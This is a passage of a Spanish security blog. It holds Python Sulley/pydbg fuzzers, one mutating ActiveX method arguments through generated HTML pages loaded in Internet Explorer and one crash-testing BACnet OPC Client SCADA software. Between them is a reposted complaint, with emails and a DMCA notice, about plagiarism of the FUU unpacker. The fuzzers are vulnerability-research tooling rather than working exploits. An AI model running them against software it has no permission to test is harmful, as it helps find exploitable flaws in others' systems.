 name=tlb.GetDocumentation(-1)[0]
 clsid=str(tlb.GetLibAttr()[0])
 counter=0

 for vt in [x for x in pythoncom.__dict__.keys() if x.count("VT_")]:
 VTS[eval("pythoncom.%s" % vt)]=vt

 print "[+] Total classes for fuzzing: " + str(tlb.GetTypeInfoCount()) + "\n"

 for i in xrange(tlb.GetTypeInfoCount()):
 name=tlb.GetDocumentation(i)[0]
 info=tlb.GetTypeInfo(i)
 attr=info.GetTypeAttr()
 guid=str(attr.iid).replace("{","").replace("}","")
 ac_class=name

 lastMethodName=""

 for k in xrange(attr.cFuncs):
 desc=info.GetFuncDesc(k)

 if desc.wFuncFlags:
 continue

 id=desc.memid
 names=info.GetNames(id)
 methodName = names[0]

 if methodName != lastMethodName:
 print "\n-> " + ac_class + "->" + methodName + " {" + guid + "}"
 k=0

 lastMethodName=methodName

 try:
 for name in names[1:]:
 k+=1
 except:
 continue

 # ----- Start Fuzz -----
 for j in range (0, k):
 type="string"

 try:
 if VTS[desc.args[j][0]] == "VT_BSTR" or VTS[desc.args[j][0]] == "VT_VARIANT" or VTS[desc.args[j][0]] == "VT_ARRAY":
 print "  [-] Creating fuzzing cases for arg " + str(j+1) + " of " + str(k) + " (hex)"
 type="hex"
 else:
 if VTS[desc.args[j][0]] == "VT_BSTR" or VTS[desc.args[j][0]] == "VT_BOOL" or VTS[desc.args[j][0]] == "VT_VARIANT" or VTS[desc.args[j][0]] == "VT_UII" \
 or VTS[desc.args[j][0]] == "VT_I2" or VTS[desc.args[j][0]] == "VT_I4" or VTS[desc.args[j][0]] == "VT_EMPTY" or VTS[desc.args[j][0]] == "VT_NULL" \
 or VTS[desc.args[j][0]] == "VT_CY" or VTS[desc.args[j][0]] == "VT_DECIMAL" or VTS[desc.args[j][0]] == "VT_R4" or VTS[desc.args[j][0]] == "VT_R8":
 print "  [-] Creating fuzzing cases for arg " + str(j+1) + " of " + str(k) + " (integer)"
 type="integer"
 else:
 print "  [-] Creating fuzzing cases for arg " + str(j+1) + " of " + str(k) + " (string)"
 type="string"
 req=s_get("string") # session
 except:
 print "  [-] Creating fuzzing cases for arg " + str(j+1) + " of " + str(k) + " (string)"
 type="string"

 req=s_get(type) # session
 req.reset()

 for i in range(req.names["ini"].num_mutations()):
 data=[]
 data.append("<META HTTP-EQUIV='Refresh' CONTENT='"+str(refreshTime)+"; URL=file:///"+tmpfolder.replace("\\", "/")+"/test"+str(counter+1)+".html'>\n")
 data.append("<html>\n<body>\n")
 data.append("<object classid='clsid:"+guid+"' id='target' />\n")
 data.append("<script language='vbscript'>\n")

 targetStr = "target." + methodName + " "

 for l in range (0, k):
 if j == l:
 if type == "string":
 targetStr += "\""

 try:
 targetStr += s_render()
 except:
 targetStr += s_render().encode("hex")

 if type == "string":
 targetStr += "\""
 else:
 if type == "string":
 targetStr += "\"XX\""
 else:
 targetStr += "00"

 if l<k-1:
 targetStr += ", "

 targetStr += "\n"

 data.append(targetStr)

 data.append("</script></body>\n</html>\n")

 file = open(tmpfolder+"\\test"+str(counter)+".html","w")
 file.writelines(data)
 file.close()
 counter+=1

 s_mutate()

 if counter == 100:
 print "Starting fuzzing"
 t = start_proc(iexplorepath, tmpfolder + "\\test0.html")
 t.start()
 # ----- End Fuzz -----

 print "\n[+] Creation files has ended\n"
 print "\n"
 sys.exit(0)

#############
### INIT ####
#############

def main():
 os.system("cls")

 parser = optparse.OptionParser()
 parser.add_option('-l', dest='lst', action='store_true', help='list all components')
 parser.add_option('-n', dest='new', action='store_true', help='hidden windows components')
 parser.add_option('-s', dest='name', help='search components by name (ex: -s Office)')
 parser.add_option('-i', dest='id', help='search components by clsid (ex: -s {xxx-xxx-xxx-xxx})')
 parser.add_option('-m', dest='file', help='list methods by file (ex: -m c:\\path\\activex.dll)')
 parser.add_option('-f', dest='fuzz', help='fuzz file (ex: -f c:\\path\\activex.dll)')

 (opts, args) = parser.parse_args()

 if not opts.lst and not opts.new and not opts.name and not opts.id and not opts.file and not opts.fuzz:
 print "^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n"
 print "COM Activex fuzzer (by Pepelux && Roi)\n"
 print "^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n"
 parser.print_help()
 else:
 print "[+] Starting analysis ...\n"

 if opts.lst is not None:
 getCLSID("", "all")

 if opts.new is not None:
 getCLSID("", "new")

 if opts.name is not None:
 getCLSID("name", opts.name)

 if opts.id is not None:
 getCLSID("id", opts.id)

 if opts.file is not None:
 getTypes(opts.file)

 if opts.fuzz is not None:
 startFuzz(opts.fuzz)

if __name__=="__main__":
 main()

Y el correspondiente request:

# script to fuzz ActiveX
#
# by:
# Pepelux <pepeluxx@gmail.com> - http://www.pepelux.org/ && http://www.enye-sec.org/

from sulley import *

##################################################

s_initialize("string")
if s_block_start("ini"):
 s_string("A")
s_block_end()

s_initialize("integer")
if s_block_start("ini"):
 s_int(0, format="ascii", signed=True)
s_block_end()

s_initialize("hex")
if s_block_start("ini"):
 s_random("\xff", min_length=1, max_length=500)
s_block_end()

Un saludo a todos, en especial a Roi (http://elotrolad0.blogspot.com/).

Etiquetas: , ,

Lamerz!

dic 17

Publicado por Pepelux en Cracking, Exploits | 1 Comentario

Esto es una copia del post de NCR como apoyo por el plagio que ha sufrido y para difundir un poco más lo ocurrio.

Puedes ver la entrada original aquí: http://crackinglandia.blogspot.com/2010/11/lamerz.html

Hola!,

este pequeño post es para contarles algo sobre lo cual tal vez ya esten al tanto.

La semana pasada, un compañero de la lista de Crackslatinos me señalo un post en un blog, ese post era el siguiente:

http://martik-scorp.blogspot.com/2010/11/martk-unpacker.html

Seguramente, ese link no les va a funcionar, sin embargo, todavia se puede acceder desde la cache de google: http://goo.gl/0J0o9

Bajo una vista rapida no parece nada del otro mundo, otra tool para desempacar … pero mirando detenidamente, veo que tiene muchas similitudes con FUU:

Epa!, los mismos plugins que FUU?, las mismas tools que FUU?. Bueno, pero FUU es open source bajo GPLv3, con lo cual, cualquiera puede agarrar el source, agregar nuevas funcionalidades y hacer su propio release, obviamente bajo la misma licencia que el proyecto original, ademas, esta obligado a dar creditos al autor original. Obviamente, las modificaciones hechas:

7. Additional Terms. “Additional permissions” are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions. When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission. Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms: * a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or * b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or * c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or * d) Limiting the use for publicity purposes of names of licensors or authors of the material; or * e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or * f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors. All other non-permissive additional terms are considered “further restrictions” within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying. If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms. Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way.

Pero cual fue la sorpresa? bueno, primeramente, no habia ninguna mejora a simple vista pero lo que si se podia observar era que todas las strings habian sido editadas:
Y peor todavia, en los plugins los creditos habian sido editados tambien, atribuyendole los creditos a un tal MART!K:

Para los detallistas, se puede observar que los espacios sobrantes en las strings fueron reemplazados por espacios en blanco, lo cual me da la idea de que ni siquiera se tomo el trabajo de compilar nuevamente el proyecto sino que mediante algun tipo de editor de recursos como ResHackers, simplemente edito los strings, cambio un icono y un BMP.

Al ver esto, me senti un boludo, por que? porque todo el laburo que habia hecho y compartido con la comunidad, de buena fe y con muchas ganas, habia sido plagiado.

Luego de ver todo esto, decidi enviar un mail al autor y aca estan los mails intercambiados con el:

—————
from +NCR/CRC! [ReVeRsEr] to Martik.Panosian@gmail.com
date Tue, Nov 23, 2010 at 2:05 PM
subject FUU & MART!K Unpacker
mailed-by gmail.com

Hi!, i’m the author of FUU (and MART!K Unpacker too¿?), i saw your blog and post about FUU, sorry, MART!K Unpacker. You are stealing a project, and idea just replacing strings???? come on!!! please, write your own version!.

BR,
NCR
—————

La respuesta fue la siguiente:

—————
from martik panosian to “+NCR/CRC! [ReVeRsEr]”
date Tue, Nov 23, 2010 at 2:32 PM
subject Re: FUU & MART!K Unpacker
mailed-by gmail.com
signed-by gmail.com

hello, yes, you right, but the source code is free, isnt it? btw, i appreciate your work. i dont see any wrong thing with what i was done!
—————

A lo cual conteste:
—————
from +NCR/CRC! [ReVeRsEr] to martik panosian
date Tue, Nov 23, 2010 at 2:34 PM
subject Re: FUU & MART!K Unpacker
mailed-by gmail.com

yes, but i don’t see any link or mention to the original project, so …..
—————

Y agregue lo siguiente:

—————
from +NCR/CRC! [ReVeRsEr] to martik panosian
date Tue, Nov 23, 2010 at 2:37 PM
subject Re: FUU & MART!K Unpacker
mailed-by gmail.com

in the readme and license you saying that YOU create the software and that’s no true, so, please add a mention to the original project and author.

BR,
NCR
—————

Despues de un rato, respondio lo siguiente:

—————
from martik panosian to “+NCR/CRC! [ReVeRsEr]”
date Tue, Nov 23, 2010 at 2:49 PM
subject Re: FUU & MART!K Unpacker
mailed-by gmail.com
signed-by gmail.com

ok, you right. i will mention to your blog and original software as soon as possible. sorry about that. p.s. now im on mobile. as soon as i get my pc, i’ll fix that.
—————

Con lo cual respondi:
—————
from +NCR/CRC! [ReVeRsEr] to martik panosian
date Tue, Nov 23, 2010 at 2:50 PM
subject Re: FUU & MART!K Unpacker
mailed-by gmail.com

Thanks!
—————

Luego de esto, la mencion fue agregada pero los creditos al proyecto y autor original tanto en el binario como en los plugins seguian (y siguen) sin aparecer, con lo cual, envie tres nuevos mails al autor y obviamente, ya no tuve mas respuestas de su parte:

—————
from +NCR/CRC! [ReVeRsEr] to martik panosian
date Tue, Nov 23, 2010 at 3:02 PM
subject Re: FUU & MART!K Unpacker
mailed-by gmail.com

btw, i can’t see any new feature in your version, it would be great if you contribute to the original project or add something new to your own version.

Cheers,
NCR
—————

—————
from +NCR/CRC! [ReVeRsEr] to martik panosian
date Wed, Nov 24, 2010 at 11:44 AM
subject Re: FUU & MART!K Unpacker
mailed-by gmail.com

Thanks for adding the mentions to FUU in your blog. Btw, you should do it in your package too and release the modified source code of you tool, remember that the FUU project is under GPLv3, so, if you release a modified version of my sources, then, you must release those modified sources.

Have a nice day.
—————

—————
from +NCR/CRC! [ReVeRsEr] to martik panosian
date Wed, Nov 24, 2010 at 11:54 AM
subject Re: FUU & MART!K Unpacker
mailed-by gmail.com

one last thing: the log messages must remain as the original, for example, in the aspack plugin it says: “Developed by: Mart ik Panosian” and we all know that is not true, so, please, do it in the right way. GNU legal team was contacted in order to verify that you are complying with the GPLv3 license.
—————

Luego, MCKSys, de la lista de Crackslatinos, hizo la denuncia pertinente a la gente de blogger y esta fue la siguiente:

—————
from MCKSys Argentina reply-to crackslatinos@googlegroups.com to crackslatinos@googlegroups.com
date Wed, Nov 24, 2010 at 9:38 PM
subject Re: {CrackSLatinoS} Malas noticias NCR
mailing list Filter messages from this mailing list
mailed-by googlegroups.com
signed-by googlegroups.com

Bueno, algo es algo. Reescribo el mensaje recibido por la denuncia que hice: Hemos recibido su aviso de incidente de la DMCA en http://martik-scorp.blogspot.com/2010/11/martk-unpacker.html con fecha del 23.11.2010 y hemos revisado el contenido que supuestamente infringe la ley. De acuerdo con nuestra política, hemos dejado el contenido sin conexión y se ha informado de la reclamación al autor del blog. Si en esta entrada vuelve a aparecer el contenido objeto de la infracción, le rogamos que nos informe de ello para tomar las medidas oportunas.

Atentamente,
El equipo de Blogger

Esperemos que sirva para algo…
—————

Luego de eso, su post en el blog fue removido.

Ademas, otra persona muy reconocida del ambiente, Nicolas Brulez, al cual le agradezco la gentileza, hizo un pequeño analisis sobre este tal “MART!K”:

http://omgwtfhax.org/

Luego, en los foros de ARTeam y tuts4you me dieron mas ejemplos sobre este tipo, que al parecer, es un lamer bien conocido en el ambiente (no lo era hasta ahora por mi), se encarga de rippear muchos de los releases que la scene va sacando, de hecho, si miran en su web van a ver muchos releases de grupos conocidos pero obviamente rippeados por el.

Agradezco tambien a Guan de Dio por poner un mensaje en su blog: http://guandedio.no-ip.org/

Ah, algo que me olvide de mencionar es que la licencia de este tal “MART!K Unpacker” no es la GPLv3 sino “MART!K License”.

Que quiero exponer con todo esto? pues que un software OpenSource es libre pero no en el sentido de “Cerveza gratis” como bien dice la GNU, sino en el sentido de que cada uno puede agarrar ese codigo, modificarlo, distribuirlo, copiarlo pero siempre y cuando reconozca al autor original y coloque los creditos correspondientes, aunque la licencia no lo este obligando, siempre es de buena educacion dar creditos al autor correspondiente.

Asi que por favor, a no chorear!!! :)

Hasta la proxima!.

Saludos.

UPDATE (14/12/2010): Parece que el mismo día que armé este post, y al ver que su post original en su blog fue removido por la gente de Blogger, el amigo Mart!k abrió un nuevo blog en wordpress con el mismo post sobre “su” unpacker: http://martik2scorp.wordpress.com/2010/11/28/martk-unpacker-1-0/. Triste! pero … que se puede esperar de un lamer?.

Etiquetas: ,

Usando Sulley para fuzzear aplicaciones locales

dic 2

Publicado por Pepelux en Exploits, Fuzzing | 13 Comentarios

Como comenté en el anterior post, Sulley es una herramienta impresionante para fuzzear aplicaciones, pero viene más preparada para atacar servidores y no para aplicaciones locales. Como la generación de mutaciones funciona muy bien, he creado un script que usa esta funcionalidad, para atacar aplicaciones locales que cargan ficheros por línea de parámetros, es decir, ficheros de tipo DOC, XLS, PDF, TXT, SWF, etc. Esto unido a pydbg de PaiMei para controlar las excepciones.

La verdad es que el script no tiene ningún misterio. Lo que hace básicamente es:

  1. Genera una mutación con Sulley
  2. Crea un fichero con el resultado
  3. Abre el programa a fuzzear pasando como parámetro el fichero generado
  4. Pausa de 5 segundos para dejar que abra correctamente y, para que el manejador de excepciones haga su trabajo en caso de haber un crasheo
  5. Si todo ha funcionado bien, cierra y lanza la siguiente mutación
  6. En caso de crasheo, muestra los datos por pantalla y termina

El fichero de sesiones variará poco de una aplicación a otra, teniendo que indicar únicamente la ruta del EXE y la extensión que se desea usar para el fichero. La librería se la tendrá que crear cada uno, en función a lo que se desee fuzzear (PDF, SFW, etc).

He creado un ejemplo sencillo para fuzzear BACnet OPC Client 1.0.24. Podeis ver la vulnerabilidad y descargar el programa aquí: http://www.exploit-db.com/exploits/15026/. Hace tiempo escribí un tutotrial sobre como explotar esta aplicación (para iniciados en el fantástico mundo de los Buffer Overflows en Windows) en el que lo hacíamos de forma manual todo. Lo podeis leer aquí: http://pepelux.org/download.php?f=papers/BACnet.pdf

Repito que con ese programa no tiene mucho sentido usar un fuzzer ya que se explota con una cadena demasiado larga. Pero sí que tendría sentido para usarlo en un navegador o en un lector de PDFs, ya que es donde Sulley nos permite usar su potencial y, con unas buenas librerías, se pueden hacer maravillas.

Aquí va el código de la sesión:

# script to fuzz SCADA BACnet
#
# by:
# Pepelux <pepeluxx@gmail.com> - http://www.pepelux.org/ && http://www.enye-sec.org/

from sulley import *
from requests import bacnet_generic    # library to fuzz
from time import sleep
from pydbg import *
from pydbg.defines import *
import os
import threading
import sys

req=s_get("bn")        # session
stop=0

tmpfolder="c:\\sulley\\tmp\\"
name=tmpfolder+"test.csv"
proc_path="C:\\Program Files\\SCADA Engine\\BACnet OPC Client\\";
proc_name="BACnOPCClient.exe";

################################
### ACCESS VIOLATION HANDLE ####
################################

def av_handler(dbg):
 print "Access Violation Handler"

 print dbg.dump_context()

 try:
 mod = dbg.addr_to_dll(dbg.context.Eip)
 print 'Eip module path : ', mod.path
 print 'Eip module base : 0x%08x'%mod.base
 print 'Eip offset : 0x%08x '%(dbg.context.Eip - mod.base)
 except:
 print 'Unable resolve Eip module'

 global stop
 stop=1

 dbg.stack_unwind()

 for i in dbg.disasm_around(dbg.context.Eip, 12):
 print "%x %s"%i

 dbg.terminate_process()

 return DBG_CONTINUE

##################################
### START PROCESS USING PYDBG ####
##################################

class start_proc (threading.Thread):
 def __init__(self, t_proc_name, t_name):
 threading.Thread.__init__(self)
 self.t_proc_name = t_proc_name
 self.t_name = t_name

 def run(self):
 dbg = pydbg()
 dbg.load(self.t_proc_name, self.t_name)
 dbg.set_callback(EXCEPTION_ACCESS_VIOLATION, av_handler)
 dbg.run()

#####################
### STOP PROCESS ####
#####################

class stop_proc (threading.Thread):
 def __init__(self, t_proc_name):
 threading.Thread.__init__(self)
 self.t_proc_name = t_proc_name

 def run(self):
 os.system("taskkill /T /F /IM "+self.t_proc_name+">"+tmpfolder+"/null")

#############
### INIT ####
#############

if not os.path.isdir(tmpfolder):
 os.mkdir(tmpfolder)

for i in range(req.names["ini"].num_mutations()):
 file = open(name,"w")
 file.writelines(s_render())
 file.close()

 print "starting target process (session "+str(i)+")"
 t = start_proc(proc_path+proc_name, name)
 t.start()

 sleep(5)
 print "stopping target process"

 t = stop_proc(proc_name)
 t.start()
 t.join()

 if (stop == 0):
 s_mutate()
 else:
 sleep(2)
 sys.exit()

Y la mini-librería usada en este caso:

# script to fuzz SCADA BACnet
#
# by:
# Pepelux <pepeluxx@gmail.com> - http://www.pepelux.org/ && http://www.enye-sec.org/

from sulley import *

########################################################################################################################

s_initialize("bn")
if s_block_start("ini"):
 s_static("OPC_TAG_NAME,OBJECT_TYPE,INSTANCE,OBJECT_NAME\n\\")
 s_string("A", size=400, padding="A")
 s_static("\\<OPC Server Name>\\<OPC Tag Name>,0,0,\n")
s_block_end()

Si a alguien se le ocurre alguna forma de mejorar esto que me mande un mail :)

Un saludo a Roi y a Boken, que me han ayudado con muchas dudas

Etiquetas: , ,